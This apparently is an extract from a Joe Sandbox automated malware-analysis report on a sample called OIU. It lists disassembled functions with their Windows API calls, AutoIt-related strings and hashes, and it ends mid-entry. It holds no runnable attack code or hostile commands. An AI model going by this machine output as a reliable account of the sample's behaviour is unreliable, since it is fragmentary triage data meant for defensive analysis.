                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 799131459-1154884017
                                                                      • Opcode ID: a4a859d1e5bb8a2a18656546bf5ced81b4b8318f106733223a9bc22291616931
                                                                      • Instruction ID: 7c765b7232646c0b24710d88715358efab5287636242f9de66bd07d82b2ce650
                                                                      • Opcode Fuzzy Hash: a4a859d1e5bb8a2a18656546bf5ced81b4b8318f106733223a9bc22291616931
                                                                      • Instruction Fuzzy Hash: B061F072524315BEEB14DF64CC81FBE77A8FB08711F104649F825E61D1DBB4AA88CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 0-1645009161
                                                                      • Opcode ID: f555da7950af4cae931ce410ae7cfd663e734e2e45bff70831af2ed00f475a77
                                                                      • Instruction ID: 2805e287fdf04938fd2144047bff4de9e001ad9038c152a334958bbe031baf60
                                                                      • Opcode Fuzzy Hash: f555da7950af4cae931ce410ae7cfd663e734e2e45bff70831af2ed00f475a77
                                                                      • Instruction Fuzzy Hash: 9381C671A58605BBDB20AF61DC82FBE37E8EF16300F0440A5F905AA192EF70DE11D7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BC00C6 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BC00C6
                                                                        • Part of subcall function 00BC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32( =,00000FA0,2E147FDC,?,?,?,?,00BE23B3,000000FF), ref: 00BC011C
                                                                        • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0127
                                                                        • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0138
                                                                        • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable,?,?,?,?,00BE23B3,000000FF), ref: 00BC014E
                                                                        • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,?,?,00BE23B3,000000FF), ref: 00BC015C
                                                                        • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,?,?,00BE23B3,000000FF), ref: 00BC016A
                                                                        • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0195
                                                                        • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC01A0
                                                                      • ___scrt_fastfail.LIBCMT ref: 00BC00E7
                                                                        • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                      • String ID: =$InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 66158676-2336770138
                                                                      • Opcode ID: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                                      • Instruction ID: 078f16327c306fc38f25063f32f91889545f026190e70dfff4a8e25df0195acb
                                                                      • Opcode Fuzzy Hash: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                                      • Instruction Fuzzy Hash: 7321A132A64711EBE7116BA4AC4AF7EB3E4EB05B61F14457DF805B22A1DBB49C009B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C05A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadIconW.USER32 ref: 00C05A2E
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C05A40
                                                                      • SetWindowTextW.USER32 ref: 00C05A57
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C05A6C
                                                                      • SetWindowTextW.USER32 ref: 00C05A72
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C05A82
                                                                      • SetWindowTextW.USER32 ref: 00C05A88
                                                                      • SendDlgItemMessageW.USER32 ref: 00C05AA9
                                                                      • SendDlgItemMessageW.USER32 ref: 00C05AC3
                                                                      • GetWindowRect.USER32(?,?), ref: 00C05ACC
                                                                      • _wcslen.LIBCMT ref: 00C05B33
                                                                      • SetWindowTextW.USER32 ref: 00C05B6F
                                                                      • GetDesktopWindow.USER32 ref: 00C05B75
                                                                      • GetWindowRect.USER32(00000000), ref: 00C05B7C
                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C05BD3
                                                                      • GetClientRect.USER32 ref: 00C05BE0
                                                                      • PostMessageW.USER32 ref: 00C05C05
                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C05C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                      • String ID:
                                                                      • API String ID: 895679908-0
                                                                      • Opcode ID: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                                      • Instruction ID: 22487894bf3272f3d08bf58a37f36066a0a69083b17a66c0c77b9e7c07cb6817
                                                                      • Opcode Fuzzy Hash: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                                      • Instruction Fuzzy Hash: 72713A31A00B09AFDB20DFA9CE86BAFBBF5FF48704F104518E556A25A0D775AA44CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C030F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 176396367-1603158881
                                                                      • Opcode ID: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                                      • Instruction ID: 7437df278c1d476c453296e9fca6745ebed2e662c1f650c28996565447c6ba53
                                                                      • Opcode Fuzzy Hash: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                                      • Instruction Fuzzy Hash: 35E1D731A00566ABCF249FA4C891BEDBBB8BF54710F648169E466B72D0DB30AF45C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2055661098-1000479233
                                                                      • Opcode ID: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                                      • Instruction ID: 86ae4e705645a4700cf6cc3a452d3499ad294ea956a759fd78b421093dd27b6a
                                                                      • Opcode Fuzzy Hash: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                                      • Instruction Fuzzy Hash: 7AB1E3716083029FC718DF28C890AAEB7E5AFA7764F50491DF4A6C7291D730DA84DB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C2B198
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1B0
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1D4
                                                                      • _wcslen.LIBCMT ref: 00C2B200
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B214
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B236
                                                                      • _wcslen.LIBCMT ref: 00C2B332
                                                                        • Part of subcall function 00C105A7: GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                                      • _wcslen.LIBCMT ref: 00C2B34B
                                                                      • _wcslen.LIBCMT ref: 00C2B366
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C2B3B6
                                                                      • GetLastError.KERNEL32(00000000), ref: 00C2B407
                                                                      • CloseHandle.KERNEL32(?), ref: 00C2B439
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2B44A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2B45C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2B46E
                                                                      • CloseHandle.KERNEL32(?), ref: 00C2B4E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 2178637699-0
                                                                      • Opcode ID: a885bb8bb293191f4cabbbd96a89e755e7dd7d22a6ca4c0205f10f0438c41a00
                                                                      • Instruction ID: c38bfcd62e1858ffa6c49f6607251937f2b22ecb3598d53c8d08e97351ce09b1
                                                                      • Opcode Fuzzy Hash: a885bb8bb293191f4cabbbd96a89e755e7dd7d22a6ca4c0205f10f0438c41a00
                                                                      • Instruction Fuzzy Hash: 2CF1AD71608310DFC714EF24D891B6EBBE1AF85310F18859DF8A99B2A2DB71ED44CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemCount.USER32(00C71990), ref: 00BE2F8D
                                                                      • GetMenuItemCount.USER32(00C71990), ref: 00BE303D
                                                                      • GetCursorPos.USER32(?), ref: 00BE3081
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00BE308A
                                                                      • TrackPopupMenuEx.USER32 ref: 00BE309D
                                                                      • PostMessageW.USER32 ref: 00BE30A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 36266755-4108050209
                                                                      • Opcode ID: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                                      • Instruction ID: fe53a2c25614156acc7c4bf2ee98a479f51a56ce45ac803f978f78ca07143f34
                                                                      • Opcode Fuzzy Hash: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                                      • Instruction Fuzzy Hash: 86713531644255BEEB218F25CC89FAEBFE8FF01724F244256F5246A1E0C7B1AD50DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C36CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32 ref: 00C36DEB
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • CreateWindowExW.USER32 ref: 00C36E5F
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C36E81
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36E94
                                                                      • DestroyWindow.USER32 ref: 00C36EB5
                                                                      • CreateWindowExW.USER32 ref: 00C36EE4
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36EFD
                                                                      • GetDesktopWindow.USER32 ref: 00C36F16
                                                                      • GetWindowRect.USER32(00000000), ref: 00C36F1D
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C36F35
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C36F4D
                                                                        • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 2429346358-3619404913
                                                                      • Opcode ID: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                                      • Instruction ID: ecb4a264474a3836ede353bf3ba75e39bb479f5bdce105510deda89ddfe3d88c
                                                                      • Opcode Fuzzy Hash: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                                      • Instruction Fuzzy Hash: 38718B74114240AFDB21CF18DC84FAABBF9FB89304F04441DFA9997260C770EA4ACB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C3911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00C39147
                                                                        • Part of subcall function 00C37674: ClientToScreen.USER32(?,?), ref: 00C3769A
                                                                        • Part of subcall function 00C37674: GetWindowRect.USER32(?,?), ref: 00C37710
                                                                        • Part of subcall function 00C37674: PtInRect.USER32(?,?,00C38B89), ref: 00C37720
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C391B0
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C391BB
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C391DE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C39225
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C3923E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39255
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39277
                                                                      • DragFinish.SHELL32(?), ref: 00C3927E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C39371
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 221274066-3440237614
                                                                      • Opcode ID: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                                      • Instruction ID: f2e9c7c490e031dbe03e20d206f658ee4b401ecc3f93a3e6d10b8135ad25e598
                                                                      • Opcode Fuzzy Hash: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                                      • Instruction Fuzzy Hash: 60616B71108301AFD701EF64DC85EAFBBF8EF89750F004A6DF595922A1DB709A49CB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C4B0
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C4C3
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C4D7
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C1C4F0
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C1C533
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C1C549
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C554
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C584
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C5DC
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C5F0
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C1C5FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                      • String ID:
                                                                      • API String ID: 3800310941-3916222277
                                                                      • Opcode ID: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                                      • Instruction ID: 877502e33412a9674532a65e17646927b15894f8579639fddd8a2e966813764d
                                                                      • Opcode Fuzzy Hash: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                                      • Instruction Fuzzy Hash: B0513AB1540208BFDB218F65C9C8BBF7BBDEB0A754F004419F956E6210DB34EA84AB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C3856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00C38592
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385A2
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385AD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C385BA
                                                                      • GlobalLock.KERNEL32 ref: 00C385C8
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C385D7
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385E0
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C385E7
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0), ref: 00C385F8
                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00C3FC38,?), ref: 00C38611
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00C38621
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00C38641
                                                                      • CopyImage.USER32 ref: 00C38671
                                                                      • DeleteObject.GDI32(?), ref: 00C38699
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C386AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
